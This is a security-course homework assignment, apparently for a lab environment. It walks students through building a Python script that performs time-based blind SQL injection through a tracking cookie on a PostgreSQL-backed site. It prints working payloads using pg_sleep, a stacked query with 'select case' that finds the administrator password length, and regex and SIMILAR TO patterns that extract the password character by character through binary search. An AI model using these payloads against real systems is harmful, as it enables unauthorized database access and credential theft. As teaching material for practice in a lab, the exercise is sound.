3.2: HW2 (time-delays-info-retrieval)

time-delays-info-retrieval

In this homework, you will be solving a Blind SQL injection level using a Python script that implements a binary search. To begin with, in your course repository, create the directory below and cd into it. Create an initial submission file.

cd <path_to_your_git_repository>
mkdir hw2
cd hw2
touch hw2.py

Then, create a requirements.txt file that contains the requests package.

requirements.txt

requests

Set up your environment in the directory

virtualenv -p python3 env
source env/bin/activate
pip install -r requirements.txt

Then, visit the lab and launch the level.

In the level, the web application uses a tracking cookie in order to identify a particular user visiting the site. To perform the tracking, the backend server inserts the cookie value into a backend SQL database. If the SQL code for inserting and looking up cookie values in the backend SQL database is vulnerable to SQL injection, then crafting a cookie that contains syntax that can break the vulnerable insertion code may allow an adversary to execute SQL commands, if the cookie's value is not sanitized. While the results of the query might not be exposed directly through the web application, a Blind SQL injection attack is still possible.

Identify tracking cookie

Using an Incognito window, bring up the browser's Developer Tools and visit the level site. When one visits the site for the first time, a session cookie and a tracking cookie are set. Find the "Application" tab and view the cookies for the page in order to see the names and values of the cookies that are used to perform session identification and user tracking. Make a note of the name of each cookie.

While we don't know the actual query being performed, we can demonstrate injection by inserting a single-quote in the value of our cookie followed by SQL code that can indicate we've performed a successful injection. In hw2.py, utilize the code below, replacing the <FMI> with the name of the tracking cookie. The program implements a function that accesses the level site specified using a cookie that contains a specified string. Timing code is then pulled from the response to measure how long the request took to execute and returned from the function.

hw2.py

import requests, sys

site = sys.argv[1]
if 'https://' in site:
    site = site.rstrip('/').lstrip('https://')

url = f'https://{site}/'

def test_cookie(cookie_string):
  cookie_data = {
    '<FMI>' : cookie_string
  }
  resp = requests.get(url,cookies=cookie_data)
  return(resp.elapsed.total_seconds())

elapsed = test_cookie("x")
print(f"""Request "x" returned in {elapsed}""")

elapsed = test_cookie("x' || pg_sleep(3) -- ")
print(f"""Request "x' || pg_sleep -- " returned in {elapsed}""")

The program tests 2 query strings. Both queries use a bogus cookie value x. However, the second cookie attempts to break syntax by inserting a single quote to run a PostgreSQL function that sleeps for 3 seconds.

Run the code and validate that you have leveraged the BlindSQL injection vulnerability to perform the sleep.

python hw2.py <Level_URL>
...

Then, add, commit and push this initial script and its requirements.txt into your repository

git add .
git commit -m "Initial script"
git push

Once we have a successful SQL injection, we can then use it to test arbitrary conditions in the backed database. One test we can do is to find the length of the administrator's password. Consider the Python snippet below that breaks syntax, then injects a URL-encoded semicolon (%3B) to end the initial SQL statement and run a subsequent PostgreSQL command. The subsequent command performs the PostgreSQL version of an if statement via "select case". Assuming user information is kept in a table called users and that the table contains columns for the username and password for each user, then to find the length of the administrator's password we can brute-force a range of lengths to find it.

for num in range(32):
  if test_cookie(f"""x'%3Bselect case when (username = 'administrator' and length(password) = {num}) then pg_sleep(3) else pg_sleep(0) end from users--""") > 3:
    print(f'Length is {num}')
    break

Modify your Python program to return the length of the administrator's password. Note that you may need to restart the level if it has timed out before running your script. Once you have successfully modified the script to find the length of the password, add, commit and push it into your repository.

git add .
git commit -m "Find length"
git push

Note that the code above uses a linear search of all lengths. A more efficient approach would be to perform a binary search using < and > tests for the length. While we will be doing such a binary search for the password value itself, you may find implementing a binary search for the password length a good warm up exercise to do before continuing.

PostgreSQL databases support a range of query operators. We can use these operators in the injection to reveal arbitrary information contained within the database without directly observing the results of the injected query. For example, PostgreSQL supports the ~ operator as well as the SIMILAR TO operator for regular expression matching. Such expressions allow one to specify matches on string patterns in a programmatic way.

We will start with the ~ operator for POSIX regular expressions. Key to a program that uses this operator will be the ^ operator for denoting the beginning of a string and the $ operator for denoting the end of it. Consider the case where the administrator's password is 'abc'. If we replace the length check from the previous program with various regular expressions, we can then glean incremental information on the password itself.

password ~ 'b'       // True since password contains b in it
password ~ '^a'      // True since password begins with a
password ~ 'c$'      // True since password ends with c
password ~ '^a$'     // False since password is not a
password ~ '^abc$'   // True since password is abc

The SIMILAR TO operator has slightly different semantics. Rather than matching any part of the string, it matches the entire string. Key to a program that uses this operator will be the % for denoting a wildcard matching any sequence of characters. Examples are shown below again using a password of 'abc'.

password SIMILAR TO 'b'      // False password not b
password SIMILAR TO 'a%'     // True password begins with a
password SIMILAR TO '%c'     // True password ends with c
password SIMILAR TO 'a'      // False password is not a
password SIMILAR TO 'abc'    // True password is abc

More documentation on the SIMILAR TO operator can be found here

Choose one of either the ~ or the SIMILAR TO operators or the substring() function and modify your hw2.py program to perform a brute-force attack on the administrator's password that reveals the password one character at a time using it.

Ensure that your program does the following:

Only searches the valid character set (e.g. string.ascii_lowercase + string.digits or abcdefghijklmnopqrstuvwxyz0123456789)
Incrementally outputs the password as each character is determined
Works on passwords of any length via the use of exact matches after each character round (e.g. password ~ '^password-candidate$' or password SIMILAR TO 'password-candidate')
Calculates the execution time of the attack
Emits the password and exits once found

python hw2.py
o
o8
o8d
o8dj
o8djb
. . .
o8djbi8zzqhu546up
o8djbi8zzqhu546upw
o8djbi8zzqhu546upwq
o8djbi8zzqhu546upwqh
Done. Found o8djbi8zzqhu546upwqh
Time elapsed is 406.07183370000001

Once working, add, commit and push it into your repository.

git add .
git commit -m "Linear search"
git push

The prior program checked candidate characters one at a time. We can apply binary search to reduce the amount of queries required to reveal the password. To do so, we will use the range syntax within regular expressions. Specifically, the square brackets ([ ]) and range syntax (char1-char2) specify a range of characters. Again consider the case where the administrator's password is 'abc'.

Using the range expression with the ~ operator, we then have the following:

password ~ '^[a-z]'  // True since password begins with lowercase letter
password ~ '^a[a-z]' // True since password begins with a and a lowercase letter
password ~ '^[0-9]'  // False since password does not begin with a digit

Using the range expression with the SIMILAR TO operator, we then have the following:

password SIMILAR TO '[a-z]%' // True password begins with lowercase letter
password SIMILAR TO 'a[a-z]%'// True password begins with a and a lowercase letter
password SIMILAR TO '[0-9]%' // False password does not begin with a digit

The range syntax allows us to split the search space of characters allowing us to speed up the execution of our attack. Take the first character as an example. Creating a charset to be all the candidate characters used in the password, we can calculate the middle of the set (mid)

charset = string.ascii_lowercase + string.digits
mid = len(charset) // 2

We can then perform two queries to check which half of the charset the first character resides in via the regular expressions below:

password ~ '^[{charset[:mid]}]' –-
password ~ '^[{charset[mid:]}]' --

Likewise, we can do the same with the SIMILAR TO operator.

password SIMILAR TO '[{charset[:mid]}]%' --
password SIMILAR TO '[{charset[mid:]}]%' --

Algorithm

When used in a program, it is unnecessary to check both halves of the search space as done above. If the character is found in one half, it can't be in the other. If a character is not found in one half, it must be in the other. A search algorithm would take the range that has the character in it, split it in half, and run a subsequent query on one of the halves to continue the search Note that if one picks a half of a range that does not match, the next query will split the opposite half for the next round of querying.

For example, for finding the first character (say 'm'), a scenario might have the following rounds of querying on the 'abcdefghijklmnopqrstuvwxyz0123456789' (assuming the ~ operator is used)

^[abcdefghijklmnopqr] results in a match
^[abcdefghi] does not match (char in [jklmnopqr])
^[jklm] results in match
^[jk] does not match (char in [lm])
^[l] does not match
First character must be m
Try ^m$

Now that we have the first character, we can continue the process for the next character of the password. To do so, using the initial example, since we know that the first character is m, our regular expression can now be updated as shown below:

^m[abcdefghijklmnopqr]

As the example shows, we eliminate half of the search space each time we do a query. This allows us to perform a binary search on the first character of the password. Rather than taking O(n) operations where n is the size of the search space, it will now take O(log n).

Modify hw2.py to implement a program that reveals the password of the administrator account using a binary search algorithm.

Requirements

Your program requirements are the same as the linear search program

Only searches the valid character set (e.g. string.ascii_lowercase + string.digits or abcdefghijklmnopqrstuvwxyz0123456789)
Incrementally outputs the password as each character is determined
Works on passwords of any length via the use of exact matches after each character round (e.g. password ~ '^password-candidate$' or password SIMILAR TO 'password-candidate')
Calculates the execution time of the attack
Emits the password and exits once found

In addition, for this version, your program must:

Implement a binary search algorithm that uses conjunctions and regular expressions.
Check for errors such as HTTP errors (in case the level site times out for example)
Must be concise and modular by defining functions that encapsulate key parts of your program. If you find you have deep levels of indentation, consider the use of a function call.
Have incremental commits to your repository that indicate your progress.
Be well-documented. Throughout the program and especially in function declarations use Python docstrings to specify parameter names and their types as well as provide code documentation for the functionality implemented. An example of a well-documented Python function is shown below

def run_test(login, password, url, num_tests):                                  
    """Records timing data for an individual attack
    Args:
        login (str): login to test
        password (str): password to test
        url (str): URL to test
        num_tests (int): number of tests to run
    Returns:
        float: Average time taken across tests                 
    """

Rubric

Program correctness
Follows the guidelines described above
Reliably finds the correct alphanumeric password on an arbitrary level using binary search
Checks for errors as part of its operation
Emits timing information detailing its performance
Program is concise, modular, and documented clearly
Multiple incremental commits have been made to the git repository as the program has been developed